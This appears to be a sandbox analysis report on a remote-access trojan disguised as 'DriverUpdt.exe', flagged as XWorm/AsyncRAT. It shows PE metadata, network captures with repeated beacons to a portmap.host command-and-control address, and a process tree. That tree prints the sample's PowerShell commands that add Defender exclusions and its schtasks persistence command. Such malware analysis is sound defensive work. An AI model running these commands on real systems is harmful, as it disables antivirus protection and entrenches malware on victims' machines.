                          SSDEEP:1536:hZN9jYzwjg6XJlg1cpGxCgN6Fg94b6lFsmqsb7FHxQ6w3k08Bn6ZKsGOPVtrhID:hDJFjP3gOKLN6Frb6lEcRx30MlOPVFGD
                          TLSH:8E836C283BEA4029F1FFAFB559F03553CA79F7236903965F24C1024A4B13A89CE516F9
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Rwf.................H..........^g... ........@.. ....................................@................................
                          Icon Hash:00928e8e8686b000
                          Entrypoint:0x41675e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6677528D [Sat Jun 22 22:39:09 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                           Name | Virtual Address | Virtual Size | Is in Section
                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1670c | 0x4f | .text
                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x18000 | 0x4de | .rsrc
                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a000 | 0xc | .reloc
                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                           Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                           .text | 0x2000 | 0x14764 | 0x14800 | fe1fb6b6ebc82d471d994033bc77f929 | False | 0.6055163871951219 | data | 5.98433140864096 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                           .rsrc | 0x18000 | 0x4de | 0x600 | e3575bc3f61464e22b07945e182ef084 | False | 0.376953125 | data | 3.7515270043715 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                           .reloc | 0x1a000 | 0xc | 0x200 | ca717e9c532730ff63d09608f29eb26a | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                           Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                           RT_VERSION | 0x180a0 | 0x254 | data | | | 0.4664429530201342
                           RT_MANIFEST | 0x182f4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                           DLL | Import
                           mscoree.dll | _CorExeMain
                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                           Jul 2, 2024 00:33:46.197632074 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                           Jul 2, 2024 00:33:46.204066992 CEST | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                           Jul 2, 2024 00:33:46.204144001 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                           Jul 2, 2024 00:33:46.205002069 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                           Jul 2, 2024 00:33:46.214745045 CEST | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                           Jul 2, 2024 00:33:46.707642078 CEST | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                           Jul 2, 2024 00:33:46.754005909 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                           Jul 2, 2024 00:34:33.014759064 CEST | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                           Jul 2, 2024 00:34:33.014827967 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                           Jul 2, 2024 00:34:45.773448944 CEST | 49714 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:45.784511089 CEST | 37537 | 49714 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:45.784588099 CEST | 49714 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:45.846585035 CEST | 49714 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:45.851510048 CEST | 37537 | 49714 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:47.535904884 CEST | 37537 | 49714 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:47.538517952 CEST | 49714 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:50.535537004 CEST | 49714 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:50.536799908 CEST | 49715 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:50.847866058 CEST | 49714 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:51.457243919 CEST | 49714 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:51.508445978 CEST | 37537 | 49714 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:51.508459091 CEST | 37537 | 49715 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:51.508466959 CEST | 37537 | 49714 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:51.508644104 CEST | 49714 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:51.508645058 CEST | 49715 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:51.515245914 CEST | 37537 | 49714 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:51.515330076 CEST | 49714 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:51.524517059 CEST | 49715 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:51.539237976 CEST | 37537 | 49715 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:53.267940044 CEST | 37537 | 49715 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:53.267997026 CEST | 49715 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:56.114512920 CEST | 49715 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:56.117841005 CEST | 49719 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:56.121367931 CEST | 37537 | 49715 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:56.124607086 CEST | 37537 | 49719 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:34:56.127286911 CEST | 49719 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:56.156558990 CEST | 49719 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:34:56.163687944 CEST | 37537 | 49719 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:03.269603968 CEST | 37537 | 49719 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:03.270360947 CEST | 49719 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:05.176206112 CEST | 49719 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:05.178131104 CEST | 49722 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:05.182427883 CEST | 37537 | 49719 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:05.184741974 CEST | 37537 | 49722 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:05.184822083 CEST | 49722 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:05.203851938 CEST | 49722 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:05.210661888 CEST | 37537 | 49722 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:06.923130989 CEST | 37537 | 49722 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:06.923199892 CEST | 49722 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:10.254674911 CEST | 49722 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:10.257390022 CEST | 49723 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:10.260924101 CEST | 37537 | 49722 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:10.263801098 CEST | 37537 | 49723 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:10.263881922 CEST | 49723 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:10.320947886 CEST | 49723 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:10.327651024 CEST | 37537 | 49723 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:12.043107033 CEST | 37537 | 49723 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:12.043211937 CEST | 49723 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:15.848053932 CEST | 49723 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:15.849411964 CEST | 49724 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:15.854585886 CEST | 37537 | 49723 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:15.855654955 CEST | 37537 | 49724 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:15.855737925 CEST | 49724 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:15.874043941 CEST | 49724 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:15.880697012 CEST | 37537 | 49724 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:17.595630884 CEST | 37537 | 49724 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:17.595707893 CEST | 49724 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:20.301146030 CEST | 49724 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:20.303231001 CEST | 49725 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:20.307298899 CEST | 37537 | 49724 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:20.309498072 CEST | 37537 | 49725 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:20.309576035 CEST | 49725 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:20.324985027 CEST | 49725 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:20.331962109 CEST | 37537 | 49725 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:22.098975897 CEST | 37537 | 49725 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:22.099060059 CEST | 49725 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:24.863615990 CEST | 49725 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:24.864820004 CEST | 49726 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:24.870155096 CEST | 37537 | 49725 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:24.871306896 CEST | 37537 | 49726 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:24.871395111 CEST | 49726 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:24.886356115 CEST | 49726 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:24.893541098 CEST | 37537 | 49726 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:26.645062923 CEST | 37537 | 49726 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:26.648344994 CEST | 49726 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:26.740842104 CEST | 49704 | 80 | 192.168.2.5 | 208.95.112.1
                           Jul 2, 2024 00:35:26.745645046 CEST | 80 | 49704 | 208.95.112.1 | 192.168.2.5
                           Jul 2, 2024 00:35:27.301207066 CEST | 49726 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:27.302599907 CEST | 49727 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:27.306016922 CEST | 37537 | 49726 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:27.308037043 CEST | 37537 | 49727 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:27.308124065 CEST | 49727 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:27.324893951 CEST | 49727 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:27.329920053 CEST | 37537 | 49727 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:29.054744959 CEST | 37537 | 49727 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:29.054908991 CEST | 49727 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:30.441868067 CEST | 49727 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:30.443960905 CEST | 49728 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:30.448684931 CEST | 37537 | 49727 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:30.451297045 CEST | 37537 | 49728 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:30.451431036 CEST | 49728 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:30.475025892 CEST | 49728 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:30.482618093 CEST | 37537 | 49728 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:32.255877972 CEST | 37537 | 49728 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:32.256383896 CEST | 49728 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:33.067015886 CEST | 49728 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:33.068315029 CEST | 49729 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:33.073537111 CEST | 37537 | 49728 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:33.075165987 CEST | 37537 | 49729 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:33.075265884 CEST | 49729 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:33.092715025 CEST | 49729 | 37537 | 192.168.2.5 | 193.161.193.99
                           Jul 2, 2024 00:35:33.099128008 CEST | 37537 | 49729 | 193.161.193.99 | 192.168.2.5
                           Jul 2, 2024 00:35:34.876701117 CEST | 37537 | 49729 | 193.161.193.99 | 192.168.2.5
                          Jul 2, 2024 00:35:34.879236937 CEST4972937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.457391977 CEST4972937537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.459508896 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.462172985 CEST3753749729193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:35.464241028 CEST3753749730193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:35.464338064 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.481043100 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:35.485820055 CEST3753749730193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:37.240408897 CEST3753749730193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:37.240520000 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.316951990 CEST4973037537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.318658113 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.323427916 CEST3753749730193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:37.325433969 CEST3753749731193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:37.325562954 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.342818975 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:37.350259066 CEST3753749731193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:39.065277100 CEST3753749731193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:39.065551996 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.618458033 CEST4973137537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.620426893 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.625572920 CEST3753749731193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:39.627330065 CEST3753749732193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:39.627415895 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.643261909 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:39.650187969 CEST3753749732193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:41.362987995 CEST3753749732193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:41.364092112 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.176120996 CEST4973237537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.177405119 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.183255911 CEST3753749732193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:42.184659958 CEST3753749733193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:42.184731960 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.199575901 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:42.207813025 CEST3753749733193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:43.946019888 CEST3753749733193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:43.946132898 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.421952009 CEST4973337537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.428664923 CEST3753749733193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:44.440462112 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.447000027 CEST3753749734193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:44.447093964 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.463929892 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:44.470874071 CEST3753749734193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:46.237910032 CEST3753749734193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:46.238002062 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.446986914 CEST4973437537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.451395988 CEST4973537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.452332020 CEST3753749734193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:46.457129955 CEST3753749735193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:46.457225084 CEST4973537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.517920971 CEST4973537537192.168.2.5193.161.193.99
                          Jul 2, 2024 00:35:46.522751093 CEST3753749735193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:48.209928989 CEST3753749735193.161.193.99192.168.2.5
                          Jul 2, 2024 00:35:48.212846994 CEST4973537537192.168.2.5193.161.193.99
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Jul 2, 2024 00:33:46.177464962 CEST | 50822 | 53 | 192.168.2.5 | 1.1.1.1
                          Jul 2, 2024 00:33:46.190888882 CEST | 53 | 50822 | 1.1.1.1 | 192.168.2.5
                          Jul 2, 2024 00:34:45.746242046 CEST | 58161 | 53 | 192.168.2.5 | 1.1.1.1
                          Jul 2, 2024 00:34:45.768017054 CEST | 53 | 58161 | 1.1.1.1 | 192.168.2.5
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Jul 2, 2024 00:33:46.177464962 CEST | 192.168.2.5 | 1.1.1.1 | 0xc169 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                          Jul 2, 2024 00:34:45.746242046 CEST | 192.168.2.5 | 1.1.1.1 | 0xc617 | Standard query (0) | stewiegriffin-37537.portmap.host | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Jul 2, 2024 00:33:46.190888882 CEST | 1.1.1.1 | 192.168.2.5 | 0xc169 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                          Jul 2, 2024 00:34:45.768017054 CEST | 1.1.1.1 | 192.168.2.5 | 0xc617 | No error (0) | stewiegriffin-37537.portmap.host | | 193.161.193.99 | A (IP address) | IN (0x0001) | false
                          • ip-api.com
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.5 | 49704 | 208.95.112.1 | 80 | 5520 | C:\Users\user\Desktop\DriverUpdt.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 2, 2024 00:33:46.205002069 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                          Host: ip-api.com
                          Connection: Keep-Alive
                          Jul 2, 2024 00:33:46.707642078 CEST | 175 | IN | HTTP/1.1 200 OK
                          Date: Mon, 01 Jul 2024 22:33:46 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 6
                          Access-Control-Allow-Origin: *
                          X-Ttl: 60
                          X-Rl: 44
                          Data Raw: 66 61 6c 73 65 0a
                          Data Ascii: false

                          Target ID:0
                          Start time:18:33:41
                          Start date:01/07/2024
                          Path:C:\Users\user\Desktop\DriverUpdt.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\DriverUpdt.exe"
                          Imagebase:0xdf0000
                          File size:86'528 bytes
                          MD5 hash:65485B0475B6C8A3B4F35BBA541938A6
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          Target ID:2
                          Start time:18:33:45
                          Start date:01/07/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:18:33:45
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:18:33:51
                          Start date:01/07/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe'
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:18:33:51
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:18:34:02
                          Start date:01/07/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:18:34:02
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:18:34:18
                          Start date:01/07/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt'
                          Imagebase:0x7ff7be880000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:18:34:18
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:14
                          Start time:18:34:39
                          Start date:01/07/2024
                          Path:C:\Windows\System32\schtasks.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"
                          Imagebase:0x7ff753ed0000
                          File size:235'008 bytes
                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:15
                          Start time:18:34:39
                          Start date:01/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
